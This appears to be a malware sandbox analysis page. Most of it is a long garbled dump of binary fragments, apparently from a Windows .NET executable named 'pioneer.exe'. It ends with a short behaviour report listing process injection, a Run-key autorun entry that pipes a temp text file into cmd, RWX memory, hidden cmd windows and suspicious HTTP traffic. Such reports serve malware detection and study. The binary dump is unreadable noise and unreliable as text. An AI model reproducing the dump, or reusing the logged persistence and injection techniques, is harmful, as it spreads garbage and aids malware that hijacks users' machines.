z] uCS3
Ust{
uhnfVR6bFiNOdO1
}H#5
b-m7
'CeU
oPk7AHrKVNs
67pDOjdl3L
p}Hw
m:<:
4\Af
Z{-0
,]aY
F5%Q
N#IT
\ftK
W`}6n
NANON
1_K'
'TA
ODc0"a
_Y |
3p )
~ "5k
$=L}
a *{ s
L|9_
& ^cd
9f[R
Q%Nn
0AB@1
4wcr
"5`w
:p5 m
e|%1
;Q>I
icB:2
< Zj
3Er+
,? `J
uz=3Wn
l,;4P
H ]K
O4zs
.gE$
pAmO
9XMP
y|^A[.
@f,$
a5(xPbIy`
M #\
0@tf
!hBWN
@|Gm
(bSb
mYoo
$Gj2
=tGV
k;Cz
y~+B
T 'w
X|F
'k{0<
JP 58
#849wf
0tv|T
NiNCN
*YN#N~N
4>W[
6Z3X
fm!v
/4R?
X W&
h5h|
dyG#=
<pCq
nl#S
>C~'
I9?:f
@o+CO0
;0 x
[cVX
_. <
3*fK
y5!(
*?|
. N
%n%2OX
8. ;
p&~O"
Fg+S
K_0e
wR%D
PP1v
V I/
4#R
?u
N}N9NaNMN$N/NNN7NUN4N
CMQu
OXEA71x0CD9heT
zuT@
<p(z%
AkWG
:o4rV_a~
436g
<lhp
rIcC;
HAj~wR%P
4NrP
zYU[
|1 +na
Pb1,g.#
%jFycW
_QZR*U
RIOrhJGTBg0S8Ka6oz
p2{(
m_,$8
-B_p#
lRys
bn[=3
*i&
<5Tu9
^vy!
.^p0a#
~06H
`,R=
5<|N
%H|
:)5Z
|:W
gF@qj
L@kT
Dc;`
x-
(,8A
hzp,
[~~V
z*VcO
,x;&
h#u8
2u Ka
jI3NTT53z2BpREI
Rqu5
,lL.>'
c]h<B;
kqmo
(jXS
<%Z
9(~jQS
Q;)>=ne
~5),
}BT#
9)'*
fKm~
0Q2}
{K\y%
xCng
z8}
1!.@I<;
q~h3;u
J<0s
H^{H
^a;"
]TUI&
Y83@
uZ9y
5yG+e
4ZHw
PsDM:>h
*vNF
36m-_o
{jo}
b eX
il$
NCL_-
mMed_.
;&6u
t,YF%
:d{ZVW
m)@W
`lQ~%F
NkNoN
sn)
Z)+
}3Yb
5a$3 J
iqqi
9vav
dOTI[
d)J.
Fn?
+Q~R
&Tw!
5Hm[
nv,
V.h-
Type
EM` H
0e
J>zyW5:i R
OR)L
=F ETl
!L!o$_!
92;9
/{(DW
fY(B
&c<o=
N-N|NANxN5NXNTN
?75{;0*
,)&|aci
VNg6
n1MS8
D*fsZ!B
Q%k5
-d
&1k82
LGR'
ocQsojQGLhXxrSZa3
x Ia
yU(h
mS_0
dYVZ
.Fxp
|!>\
V#-
s{p!
$[\c7
YlH7qSKxoMUET
KhB&
kt{p
)5rD
5nFN
/uJk
cC0V
.X|!
c1U1JObw8BnyZS
b+QPb+_
?&R ce
h-!zy
%A'iid
u2%T
+rr
3Wm_1C& V
kV``
:y $
SdJ\
;yH
r$v\b
N>N+NfNLNnN;N
(cBk
EdQ7Tnk8FknvWHjil3T
-GV[Hk
.K3})
W9]c
c:pY p
~CeN
O1K*
JGS#j
C0j/
GetMethods
Iy,~w
System.Runtime.CompilerServices
9z"J2's
?MCNR
zAU?
vr%0
VM<m&
$? &
5IS
\ {q5
q1jR9W
1);QM
Object
?vi^^
V^~0
#B?i
t=-b
R;3zZ
4~oH[/
=Dnq
ECMVmR90TQkiD6
hwR:
YA U
>Xro
z|l>
k XO
N(CW
us0E
En'W
NoH)@:
10*#AT2 ^
>&\
JePW$
zQyZ#
xzoUVmY4eDYHm
h ZdPy
<=!@
9`KQ
9< `F
M7*
ocXwi4z4PlqInGfzO
dZ9g
{N6Q
i4f{
#'3x
0?^G
*Uka#
_6N(=m
(_0
&w3{
j%,7
c&}KB
mC+( e
xIvZ
?WfwuT7y
4xFp
V]W! Y
6bNJNHN
yIC[H
!uMz
L9Q@
r+6>V
9nDpk
NjNcN.N~NLN)N}N7N'N
QM?j
fY "
IV6ZO<
T6LZ
Nd7yNC0UoMGJC7oM1I
0 z(R
%JtW=?`
D3 g
%2_(
xH:1Kzf
=5^6
]jHSt
?"MM2
+&C>
+ 6|
h^x\
{lD ]
BSJB
w2t>7\
`OYOW
'?DI
Fof
R8V>
+|>xg-]
?<!JhR
>m#o[a
=)fd
rP7E
sngT
7b/}
8,A"R
JI s
w,"A&
1&Lx
It2mil
nvw)
.{vM
6b=I#?
ozW\O)
cpclPLaLmo8lL3U2wX
${\DG
k-:Y\
H2YC
\MR<
!@^T
Uf@ "q
ponkx
a^)!`A*
ZwEs
A/ry.E
=nV/`k
nu*Z
"2l
9vdX
5xZQj;|s
D&mu
} PUy
d<^m~
eyzjc2_
%ZxsG
9Tczu+
&<zsD6%)
N+NVNHN
Y$l2
}-''
"7?y
Gg!{
6t9eg
gm\`zFB
372LGRS4Qm7N8lNIX
x se
)uhk
get_Message
!This program cannot be run in DOS mode. $
-_FA
_[\k
3MqQ
uxYo1X4cWIYd9gU8
PeoA
X+m>
NU)
(*o|X
z 9
hd5\
G` }
1N.:
[xox
X~^1
f4,=
X]\q_Ur
I>"{X
a'.JM!Fz
&*<VF
E[=
IeMRrEANnEKZDFn8mO
TOk?
67 b
*-/cy
6:r:=F
/ ;<
N^N/N,N#N*NqN2NqN$Nj(
t [>
08Ii3
+-5
}k}_
.=pZ
38a!
Jcj7
57W/
fM~%
ht9Py
1w n
#QC<
EJf5mZ
Y1Q]K
D&u
vA5oKVSrfbiR
qmC\
VnF6
4;;'
d>fL
nyXK)
Rzn`
#Nkk
{8&r
O[@&
G>o8U
)7Rp{
*fQF
833(
H.Ez
VTbj
N_NLN7N/N2N
%<}ngT
_OPd
Jjl- #
) zT
8$Mw
GetValue
d]yf
v0@#|
)oUa
GS>d:
5qiV
rd :<
9fKjRcit2gkFcQ
d,[3J
7]b1
2\1e
-sYF
GO}!^
`n}Wd
hZ\~
} B;
Kqj3XtVG3mz
vnmkix
1V z'
x"#1
hH}`4
*5'-~
}O;|
ZRR]
XhcO
'tx;
)!xN=@
ReM0XITd3cxz4Snns
eSV3
uTA ORi)
a,G.
A,fP
u#]h
~r
A 2V
(Vtd
mtMc
hY'
*H6'
@VJ
vI[x8:
QLbt!A I
U -
kVcR
x!\4
|z R
_,$yo_
E8 R
8 45?
)3?
[H%3
9>}MW
90~
Kr\w{
eb^1B
\uO8
{AP=
`)/G
%AVl
3z-H
u,xd
1of5
LqpWx5*
@YUW
=[:t
{[gMj"0
on\[D
Mq(4
-X]
4= S
MyUh7xEsEgucIIX1Nra
m.SF5e
a%;(
sy(E
)>9/
2Lnk
qFR_
x ^l
Uu=='
"X!u
yn O
71;!1"
H s
5Jl,
|]cd
-ICxZqu
Vgl
DZ1 ~xq41f_
\#"`
@h$d
.Gc=
W u<
_Z]f
,}9N
) Pn
wgP~O
cDz 4
?o!*
NENSNM$
NeQ5
7a+yg
cg@3
9& A
GetType
XBS/
wQWv
Q[;
/ U0
\GJ?`
,i/d
F<-j
$BDr
0*!v
rDs
*cl*0
Qhy0[
y<!}P
cL .,
TM?i
0i3f
]F/8*
RfYS
t Wcr
#$K 3
s5P%
,Mui|Od
["Xl]
>iXn
HWdf
#83~
N'N)N
jFNI
h;.1
]k$v
Df"S
NK]H
|v7
X-MCf?b
N N|NlNfNhN5N%N
xS-}5
E(a_a
Y(!
1rU593/w
6,r$S
mX;b
E[c>
ovrvo
M.H$
z N}
?\mG
ITIv
_F@=tC
8,GG
n$>0
TF$q
Vv6W
;?o2\
P=Rt
`iX=cI
+X8.
\w6-
)l ,2
VCB~D
F*] p
N$N?NvN=N6N~N NtN
u'/n
^0+A
''.7
)T6
ttrLYXiIQbZYD
BG:W
2~xD
rm<
]o&*
-g,e
'$
W%/~
RQL"
"{u,
*}{h{J
&L?[
Fu2I
0& yT
Zq P
gja&)O
:n=
HK=R
>[ f+
ZCggei
<aIRj9b
loBh
7qLr
<n x
vWqFK
FNN"N:N=NnN=N
5.+udlt
D @
wP v
\YkQ
}F90w#
ZcKS
owM.d
] cf
zU3N+
P4Op
N!NqN
%EQI
OIJis
fP
ng$+
mJIxT
n$\u 5
8 9h@
xFJyNdutauF0WheMXG
C8_m
Bm%e
B\3z^x
)aB:)
WB5}
5+){r
nU[
aY#{
D|vh
2yJp
8pF
Int32
.\r2
+{9f
3q|b
U [H
F~*c
&k ,
3g{u
#;d!
m d5
|Aa'W
6-N;N NQN.NgNON@NpN
R~\>R^
?FRV
YZXo
?RM{
~)D3bL
eyiezjxi72Rm4vi1V
+>t4
?u9W=3
a_ti8
E|k[
E9,$
i7d
`yrv B
?e7
2(w0
bPM]
auKJ
*(g2
MethodInfo
,3;b5;A
M\k7 n
NLNsN N
grjw:
UY-bc
D\ K
Qqxo ?
qCd{7
R5F] y
|sRx
Xjfn
4l
CompilationRelaxationsAttribute
#<u5
d-ly
N~<
#jyf
nDd,c
? ~1ac(
^ <Y
)@su
&^SD
ld=j
L>rC[
L<>~
'e1:
hvOh8Uy7peJhO
!kl_
FlS3K9yHGeum
#23(
{.{}
$N71nmt
K@!'H%
.C`{
qw$S
FyG
X5GE
PL/G
+yL{
i71o
nKP+
v~]Q$V
b W/
W1'U
TiZI
.7 0y
lZTJ
zFOQnHeQ948p6LXt
T_dfecY<
mk<
QszB
L8yj
mN^`
*/pa
:6AM
?*no~
]y ~R
wYXv
x T
5`;B
eoWUNBHqcA5GWY
ZjF/
fB^P
Z>zzB
u4KZ
2PP1G2Z9Zgb
;Cm
}KA]
Z%(w
kLFl
mN23
@yS!
ftv`/
%t5'
%^Qqp
tY89
2M7J(\,
]7'?
cR%y=
pBpL
Bv;Y
;Upp
1\>M
xT[+
O5<C
".q=n
\c"y
4.d:
DodP
Y|i
kvoiP
8kfj8
V h"`S&
]z S
z!j%
7 cK
^{6P>
Ab[dV
.t&(
sYujq6QEZOGsdaixKi
2S%@
FvUS
Goh+$
,x4d
GNa65
=r}%3q
S Q]
lI#b
~?/g!
" c
_qx>
@ }wE
7%ex
]EL >s
/|"A
k `4
#Ug58
`y>@
Ur@2B9
N{N5N4N
/ ^7
/B P
wHR~*
_; 3*
mS{+s
"E1'
f|"1
n"d}
' GkY
J4c<
/ t\
74fJ
.&k{
NgNPNnNqN2N+N
RT$7
?dsF
[>bC
5C0)
*E'Zpj
T( .:8z
OaGGs
Y`cj
ZWm|
}>K8
l Wg
\7;1
)pr)
UIX?
<AK!
GetProperty
POng
9VpJ
mIEs#
l_YY
bCW
MDFh
wt7\7H
F@P:8
G=2r
["=Gh
LF5RhVKBtba2B7eWG
(@=&
N.NoN
Nzb+O
MYIi
n x%
Y \a
_?jUkZoY
r6VFR
Q,1?
L)s8
qM`Q9
NNNhN`N NiNKNoNKN{NNN NSNvN
UfAJuScYeYGj
kj "
Ur>C
ooM>5
6rLc<
im- hz&
%<52
[YMh
.Llj
XYlR=
M8pU
n9F&#|=
r*?:N
yR{Q`?B
mFB[
&p<w
I:~
nwAR:
=&:>
mm?yHV
dl1t
*('0/
s/~iT
^cr(
bv5V%
JOPA
TtBe
;98|
X# +
>SH.
G- (a
_h)\I
ABPPEPdJ0P0q
/N||}E"
g1&tz&
A97u
-Wb
/qT7A
h??D
.Y8R
>O"3
Ipi)t
p}$t 9
WQ^
zMz:I
(H8ue
4OO
Fmnw
=FmcY
H_z
:t+i
azZd-
;T$t
lv ME~
hYtwG
IhLY[1,
Jg>,
WQ\tL kd
` >Uf
?.bO
Vo?6
DAeS
T%~f-K
D[ <
"l$i
s /
vhk=
>9I`
5lZd
7GV"9
Yn ]
=V =;
!Tl
mC.XQ
sd2&6wj
ui:<
tpx]'6DhU
{'ov
I28t
AIJ7TA4dY2u
:(JpS
KI6E7
s5;W2g
Rs2u
_MsJ
jLwX5
!)2L
W/2j
8>aX]
{|{]
wnqtG
K jm
\U55BF
NbN[NoNmN8NxN
-9StD2e
`>}w
-n~=I
i8F5a
5r?0
[O #b
&0C`(
:&[h
PMS9
Op3V( |3
.m1&P
249
}DGn
%/Z{
Qwl5z6Ha78yRB1RZ8
BX*!
uwS Pi
hB]v9
a>;:
>0(Y
V(&b H)h
[XA5
~3Yi
.q r
v2o>"
"8PJ
s^%<Y
=h)Pu
K(Y,
k#MS
_=yuf
UDCO
6 R c
4n-*
E1~
TotmiuDTgrtepXLpCt
&T@1
dlU%
Nw9?
g]$8
WdLrQ
]K4u
xs|B
B.!z&
@51<
zp#`:$
r?b;
rgRgu
L#u-TY>
x{wZk(
yy30r
OOe2
5 ?D
h[h%
YoT2
}V-*
c\)#
dQa@
_g"l
<\bh
& ]V
zLo
c &|
%eVa9f
x9 Az
(2.S
^2XG
H8Wl
KLvL
|G'_w
Nbxz
$n )
\vWs
.6a-
[Ojr
.[oW-3K
91NB9EoJvEvjyfI
06;x
OQ YG
yK #C
ucxqK
,B;w
wEvu
h+"
Y#?'
FeP5nI
gY!V
baBG}
ZO yF;
Zy I
,
.SA\G
s$4e
;gL(
TPtmgdtGSqDF3D9OQ
HB",
eU &
ib55f
1%^'
t[r!
d%Q
N&N6N]NtN&N
@ j=
mt6*
#&bq
W8;9
L!!9
</TmR
V}%L(
2)n_
F`6=)
B2^$Q|)
nfq<
m?f8Z
+ip6
JoV'0
}RIZ
xv^%
D9+7
*PgPp
XA4;U
c)sqH
SIS{
&D2
tL*s
kZO21GRIlUuwTrH
C9c&
'I0,
17*)
14E4
tH_/
AHJP
=_HR
we)#D9l>
UjLV
nF@d
{(rb
ygG`
mQakT
hY992
Of6R
M1d
6&ja
dL~GK
{;]W
W;?
@!Cv#@
K Ly
vhUG
4@|_
z3GP
xlhCE
!*wh
#QL7s
KQ`x
4pS\S/[#B
lkeMb76
K[7=
: vd
+@u_
Fq\a
w/@3A
% FN0~
=R4@
k#gG
jH([
LyMYUSDM
`"j'd
O,yA
)"KH
N2ij
c>j1E[
mskn
k~m<b
/a>?
B K{g
^0n.
sP^h
yMuW]
;.D
+e7w
*QUl2
*KNf
n#YG
4.qW
oE1X
l/W<c
S-aE
qE'ry
suQY[
S7IB
Z Yr
?uT[
ORQ|
C7o/
88'
jcSk5
+B>g
!/&9*m8
cA,I
qBL/G"
f~5{
mWq!n
) NB
t(<19
yeghhjx
35L-
,/)_
j&NCb
C XH
SbwAs393 e
T ;W
$d&t5
rJx[
J,np
Foa6
-f m
TkdwkqOWhA8qrA
/`o<!c
-\!r
#Hnr
ZM7V
J;2|-
%F31
QeA2HnECTm9FgYHoK
^*&H
q2wE
mY2UBc0EvLkvpKL54
T^ "
FHM;
+gPtp#
9Qaf\
gWr !
NpNtN]NkNjNRNyN
]c6{
OLf6*
~JYHX`
v<ZB
^PX/u
M[aZb)$
NMR}
;3$<E
GU2n"
NON/NMN
cw*JK]@
W5 \p
'5q:w]
BQ{j"
:vzdK
{u&
lVZ[
M30:
ypE&
9Bpo p
NKNMN%N\N/NuN
SHDi#
ne=O
',}B
y8Ev
/:o|
kSm2
BcWD
uD>]}96
\>HT
3!o+d:v$
l_ Ah
/g U
AqoTK
a`P;
MQ8<
:YP,
p|X)
JA<We
I8A$
H9]}
q_XK
7nr
x }t
l+s4
W Hx
u0d
i1% kB#|
G1M?Dp|
:}dwC|
\p]{!C
Nq9g
'H5Y
Is5>
83Z0X
8 I
LyU]
d O!
K8^>$
lSgY
+ n>
MH)N
Ck$K
s\8n5
N.NrNtNx
N<N/N
0b
_52E:
FE$8
|"W@H
M\O(P
'd U'
&pji6
se\
Ac>N
mC} r
LVGM
obyxh7ffkw
95DgAOFHUeHus
Sp)G
mj2[
PBSD&
j|[\ja&Z2
v+xi
X"1$o
G:u`T
,wy29
#2Y5i UC
`rX
3xrL7
ui4>OW
8A9{*
=xXH
BES^O
8EsO
ZiC>
U[Ov
65f{
0*H)
^VC
Pj`,
Q3nj
sFVB
_S`'
eU!5
=eK
.G;|
Hf~f
W#\a
SX\K
TNig6Gh9PH
J=u7QOG
b6?_
HA :RN
1X;0
_N
K3^T1$
HnN/N N(N
n^=(NK
#%I@
p'CC,l
w\DN
oS=x
&8f`
{;~j
{VY-*:
C7s`e
,9f%
:D1?
GK}d.
us3}
ER|"5HN
_)K_
,VH%)z
m|FC
t4xeI
9bf&7*
&^myB4
:h69
p%m:
/su Z
A[j?e'
* Dh
<V`%
,-AT
[B=?
4{OR
N#NDN
q #T
]`[>
K<V
K/`X
{Se '
neeir
ixl-
eA)
z *
eZD"
LT=H
rUxG
) qb
Ki`B
i[C;
P,R;i
c\N4QR
1cL
5S8WN
y>" N
Znyl
mq,J
Df%8vH
H#`z
o I~
[!1qE
Xw>{
pj6tR }P
*[Q6
CJ@,
-)%vLGE
6r [b4
<A`.A
N&:cPv
?8w+
#B T
:!IlL
LfoW`M.
h6T,L
@65
inW2
{.\Rg
`D1K
jB!b
\ 6j?&
V**)
qa#}~
d[ Q
24B
{TK
2NGho
mRQ&&
MDo~
$]7C
a+u/
QQa|
8{g+~w
w? `
el/D
DMqA
x2i4gzNA9Z8Rav
@VGb
8 =O
$^ 0
7i'e|
6jmvA
fHXBxBXj69EvTVzAv0
bX(p
NrM`
|FXj
)o,C-\
+8"(
am?w
AX\n
u<o:3
'ryO
V =(lX
8&7LE
F}A>-}
hgA!
R>-m pz"&O
qq!/tR
}l<,
iSgI_2
ggH4fzy6XylK3c
_7'-
&H4e`
Q~>Bw
cDk)
A7:q
/i^j/n
lpZ8E8NmOngvVpw
{7Pr
[3k@A
~}.<U
-Jo$
4,lI
*3d7
A!k Z
hx5fq5
P#Mf
CaRfe{aB
MethodBase
mI qXw\
j@zXH
Pu K
&8/_
yb;/
\!H
q,<H
e[^
/@BA2
NENCN
k 9{c
1jM2!
C ^DD
t?G,)
>LrQ
NS/
h-DnfV
Bi:C
:\17x
I- w
9m.X
R,;g
!7\)5
LQZ]#e%
s$/a
&0rv
:! @
xa?4>
+ { ;*
:HtB
4-[g
/r9'x
c Ap
QUMOwy51XMBaWJArT
>7]Y@
abc`
wStC
t {o
5Mg"q
@7z
f7Oh
QI`#
r'DO
F%3W
'R2>W
kT6g*H
212G
R@:+r
f`RH
]M#s
rapY
z]*:
FNSqA
?s j
KQWz
{|Kl
Fh)a
4w/<
7;*'
R >tO
UrE|>
tuNb
\A&p
fAii2sOIIiaXfgH4ne
h#AD
OL+`
veb+
7pwi
/=0g
ES.n
RxM <GT[w
m%@:
D>c
FI _
hhKW
A+aG/
q&u6>
dm*j
#GDx
GhM[#%
`PM7
+M&
v!Bx
0PRk
DoEDd
9Ro
1!Wa
'ZDx
3p3^Rq|
cyR^
gUtt1
-CPDtg
G&}Y_
]h|GI`e
eQj(<j
_=^V
dqY]
N$\!8
0 M3
|S`N`
AKXT
xn_[
,Nu
System.Reflection
6vBB
zJDV
0cPa
iFI>
a#0U
2CCr
o 5X
T1=:[mzx
>ZLI
C-Dw
Q&$Y
l^wb
GzTA
(+r*
~A"+
XcjBnd
\_^hC:S{
pCpM92
)w0b,E
NTNkN_NBN{N"N,NKNKNCN
N6N.NzN(N&N\NvN
*os5
;A'=
U>^9
fu[i
_8*'
d?:Pa
5e)dg
Z_sq
MM"j
^p7c
cIzknHrOlu
!<1jl>!
~\]
n 'Zj
NENON3N1N
#+c<CJ(
L_%5
#$(g
_Y{n
J9Kv+ t
(. 7bM
Www2
2( +
4Su[
V2>
o*^p|P
T+(Oo0%|
ny;|
d)0\
H m5
NHN>NZN
PX"m
Lo\nf
Ozr?b
0{^-$6
1]~j
{<[^
z:=EZnC#f
~PI
.7F&
ol`9
V)l5
]37<yU
_6j}
"0)<
6#<D
5mDa~
>2S%
ppGOj
_:[_9
wB3HL
~@J
Vbf\
p)rB
aV8~
:2rg
4aSw
(eOFt
*u%]
-,Qb
28EoT
dkHzWvjLBEmDd6
jJZ /i
jGfrAnLenWj6MoPSC
2 1c
BQEe
B0.cr
U]!r
$O,Ya
3eQz
\-g
mQv2Ic
w5 N@
9Fqn(
#S3!L!3(Z
eo7R
Eg ZP;
2dA7q\
p&$m
Uh_v
X<$d~in8M
4p( s*d
vL0Zbcu6aI9O
"TLx#
~DbI
Mk>L
w:W%s
IOnz
'+x+
N7N?N/N\N]N N N.N=N\N N0NZNMN
#G ]
x:FY
.ATc
"TP6g
5LH.
O6E
" {6
9 a'
^No
G Y.
b A
?ajEZ
R}l
}N,k
4x.K 8Y4I
=N!K6z
SzQF
D8w,
v:?
)KPy
>C]A!hL
~1uX
P\i|G
24U)
\"+&G
`0RZ
$BDB
;s'[
7p9(
qn];
1"j*D
Tk;(6
:rym=
` ErK
fjoy
g(tJ\S
K?8)
-z1HLH
vqDiR
\$%U
q% l*
g_B#
doIP
mOy2
d5ZrG]
3[oq
w:2(lV
l"fb
]J;sO$
G(cb
{bPa
\q\Z
#$B
/8fr0l
S>p
o5Xs
Ocn|'
=>1&
/efu
b/ X
CC _
NeNeN
EkhslNNe8Oo
'v$eQ
coI`
l<{1,l
z)p}
/y[0
Z+j1
H>ES
Exception
E2 5
WuCCreCxBzqC
NKs?
Ny)9
-s 9
?~q*S
KXEgZlv4zeP
aE ;
Cuk@
=*82
> ,Xp
9=t:
`>Ts
JM0bp
=TBe
+1M(
~"eg
`2v,
[p V
WJ*;e
fF&!d
qlYE
NdNgNJNmN6s
RN=yf
fZtr
h*/^I
w53;
/gf;
#3BX
[I53
Qn#Z
og-{
NKNSNuNuN
N-~@d>J
)|e^
T @wo
pV @
I =!{\W)@
?@Ux
`~(G?-
(Y:O[
l-q p
;2/!3
+Yr=
Ag-_
B8 }!-
Q-*"*i
9KzV
$G/q
NWNlN
<bmu
gaB]
ej9
<SLH
DY*'
* eZ
uMxRF
43Lk
eLu>
eZ23
7h?I7
si(X
LhTa
ZhH<E
C[Z8
"Q4wD
i_`Py
fh!/a
NnNZN`N
*ct(
,(R
fmG
6]fJ\
630`JFC
T= ~
j 4b
qEeX;
aH('
5j b
M]0@
E "K
Dq4o
W$[H
bNdu
8TNZNyNRN%NxN(N
T p^
v2SXWVvrBn8oRoB
LXs9
@A.#k'
m 6C
H;i@3
~SVt
HOuRW
g~_[$R[H
fYom0
[$XF
C/rE!
(C h
&c^F
Vn+
liHa
@ :~X
}#i7
4]CEH
K oZ
x0mx
*BN[N
NB@ZF
~_|XA
+]3i
7 $ :
={ $g
`Oe0FyhP
)#S
-W ;|
9f7D
a`9w
[PpN%
YY;H
']v\
T ;a
=F .
VNDV
1EeAj
Ot:p
M\jb
y{ $^JD
M5.p
WJ77
l0}V$
kS }I
yoBAE
S v
P,X&
TT#re
JAI'=
/Ry&y
(@~H
)c-7U
V#Kl
W11;
GP%|Q
ew)J]
nS;_nms
6*;#
P3PXJIa2cRM4cmWjl
3YqO
f::;
?QD6<
2U,v
Y+zU
w&If
,heB
)vcV,
WLR2
N^NkN<N`NIN
lyFt
W$auOp
2[Ip
a!zT
vuu6Y}
nN +Q
#k^
'C q(
Ji6efWMuKHqpTLI7
Mgd560
4yT 4
+Ed?
@yhE
~zw,
$vovW
SdqrrrrrfS
?b`=
/"i:
Q ha
J!pM
4 urLn
N0NqN
d'=qs
O\E>+
3?<g9
f*p`C
i5 x
"HWL.[
qZ q
3P(>
%;IC5
`CUhw
7TN5
70y[v
'[:H
lP`Pc
,sp*jR
Xx>I
r%G/w
SY+K
b x)
S$5a9s
eG@
P@Om
NP W
u';-O
ENsc
,X?x_9xt
$3/n P
z.JP
System.Windows.Forms
Mrq.
= q
l[$+
}`m:
o0p X6`
rRLD~
S"3/
4b60
|!RAPx
*(m*
=EwI.
!/n#
6o`<EZt
51QI
T,6,
"E}||M3
OOG?q
IwP~%
X8QP-F
R"}_=
Ssg9!
_/Iv
NYNVNoN@NKN:NUNiN
DUILmFMA3horuwqOgp
N[N N N8Nr
00q`S$l]
~Phm
RuntimeCompatibilityAttribute
d8|
MX||
"m}z
yw|<
omD(
7f n
iXZ6Zic7GzI8enZQz
960
z<qTy2cj2
N aKh,
UdPO
wD$=
!bOMB
op_Equality
b,fc
2nN{N7N
uwwvp
5'} %
z,"{T
)}HjNv
+8vJ
zm e
/5kQ
_dVl
/ hLE
h.hJ
=*OsV
L1#U
WrhF
aHjKok4Qg8J
X0zu
"[h6h
*l{
`ZT
_QI=Nd&>
g924
x@F
?PW\
X =
vY ?
< y1
?w4!f
`5-9tF
bW H@
v]U&X
^4_7
qW>e
++Ou
g[c1
do\Q l|
6]Ul
@Oz)+
&jmW>
(k73O5
R69x
Z81$
kwkn e
I {Ka
z<P(
EroS
N\N N
LXTL
F c7
MVxh
j g,Z\
[2g^
8 yt
_hwY
/2Pv
sYai4+c
ElNH
Zun$
$1 GK
=@-kO
12?fC%0_&
g}}Q
;4kEf
3Lh
z Nf
t-k}
p:P\S
hfCZ
k= >
Gcx07M52BURmbILa
/V
$b#B
'csX
f3DVkWgyIECj4VHrVv2
@ gm
G%!!r
3' (
6Fz%
"{/]
N#N^NgN
v5t0pCBBuCtqax
`C|U<
P<n`,(
K^,8@H
Z7#=E
=wra
2au@
84\*
gRaO
n)|?@
#GUID
/de !
NhNAN
ULfx
: 7Aw
O]Vp JxV
]+#3F.
e*gy
r.I`
QkGX]
gb ")
7^pH
|.D!u
nU=*
EWcxc
9Ne
unBr9P
E([]]
D~|!l
U1uB~Qy
N*4 w=22
!<M,
X5 l
PX[w
|8!o
L*?g
N?NlN`NqNjN2N7
Yv$b
z+x@
1`R4^
m{zx!r
0#jw+h
nJ6A
ew \I6$
5ul9O
C"#x|X
NGNWN
Ej_`v
kTGVpmfrwKfboUeY
/& c[bj
5F[mg
I$U
[yAtk
oNY
Sq@~Z
IC+S
]%J"DOVAP
&zf'k1mj
U1|(
az0"
ParamArrayAttribute
v2QBGG
NtNON)NgNHNwN
k7#
{:3f
/ 8 5
6ZLH0
h0<p
8!!p
>&#b?
BQ8iB
Y>bN0
@sl.XD}rEN
hxt9
N DXkj
qUrA
}XqW
HZHqpPGrt07S2
{@PB
oO9X4g
:@hS
J\4[|d
k\\]
C* ]F
Ay T
E&*cj
?H^x
x%6:^
$cw*
&SGdVrM
52=8FN
"67'
(|EY
Y|@{gR[<4X~
*})KL
eCwEtm
w&O=9Mc
OtPD
h@hkV
1lY;
sVwPK
:%mRi-m
ScXQ
()y>
&RQypw
L2.iA
v[w5
5hl?
YMzyd
Zv<
Y@BE
J[11M
nUQ[\!
VMuEN
[gd_
U (
_DP1W !!
["S
s%
~ (>
}mJ9Er
`_ ,
(`S
tCS
AfWR
N0^
1"cT
j@M N
r #G
lDPq
r{^N
E@bXv
K ,r
+l$lA
u5}`|
VWH1
qm 0
i]ih=
X-2\0
hUmT
UNHC
22|
"ZkA
HEtw
-D(|
6o1?J-
!t2 V
l&{pM+
D4N}
m^0E
[?' +
\(q`/i
ItnPK
a-P
& a H&
!bkw
DXw}
fbSn>
N:NSN
FP \d
gwNKCWjSyJGHB
qrus
f|N^
ugb `5
qjjox
*QK1D;
mnJk
'{ov
vA(
5nH*
nuY(
6d8{
,sAk
af
6qbt
v$=C
6H_6
]nH^
y"b<
MdE5
oPfjRCKS74OKX
Dz.S{
x_yS
k8XJhbcAvHgFd0
|mt]
5lT7w/
#Wci
4Y,J
Shty
\aU3
'&D
ao:^ i
#| F
}m![p$l
!N7[T
g^W"Q
"~ J
nrY`
; .2
3nFy
h<
blB-
*(si
%P=$
Q$r-f}
';ZP
12B
-zU I
sfup
U![L
$4w4
4?vI
]Z`@
*hJ#f
1& ga`
V6l^<jg
&:kG
s338
S=d
Kf}f
^LW$
SjT(
-Qag M
T@va
fI@2
,o{B
n4pF
9x&s
iD7m[
NkNININ N
j$Ra
vi(gh`
IU^-
`+X+`C4(
S l|.
>0Am
#{pwP
WzXd\R'k
; =
=R,0q=
sn4[
sFB[
#F\
= UM<t
xf~3
BTL3
2V5
e<>]a
w T\
<lo%
tf*h
f4pxG
0V,'
n%G
OUi}
[v#
?`q
]oi.S
8F j6`
X^W.p%
OU].}
$T1a
)p ,
S)\*$R?
3R
HPHJ
-Bp
|NbjX
/ hs+
G D
5Fz[7
]uM;
&+&
poB9
?eoZ
FyJw4`
pP|1
hw `
d97PXrXQ11rYz1Nb
A'>x
4nEj
T;[,
HP7`b
'S =
qm73
ECn
-Hn
<-[`
6S-&
cC.0
Q(gK%
Ht"<r
l;$/
C @LC,
CK<H
viT@
mKT
=oU5
i`[l:
Xa};
PC(CZ
bpTX
75 8
N~*r
ExN2
8+sc
<Ta>
{]d^
H~%|
D8(f
YSoq
tO%Q
1WTG
&_fa
%M=R
6e?6
:8xa
,4k.l7
L7HC
StY(
8w[N
HMXk
*]H:
9 ybn#
^dJQd
0-*l
+w.D
auEbF
#Z#B
1_h
']m7w
" Lw
.#b/yU
MNY8
mF{Xz
$R18?
26I,
=A3
`abK]
>T-^}H
7CS
`hl2g x
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven01_64 | Seven01_64 | VirtualBox | 2017-11-02 18:48:44 | 2017-11-02 18:51:36 | 172 |
8 Behaviors detected by system signatures
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: pioneer.exe(2344) -> pioneer.exe(2592)
Installs itself for autorun at Windows startup
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\pioneer
- data: cmd /c type C:\Users\Seven01\AppData\Local\Temp\pioneer.txt | cmd
- file: C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pioneer.exe
Creates RWX memory
Severity: Medium
Confidence: Medium
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
A process created a hidden window
Severity: Medium
Confidence: Very High
- Process: neeir.exe -> "cmd"
- Process: pioneer.exe -> "cmd"
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
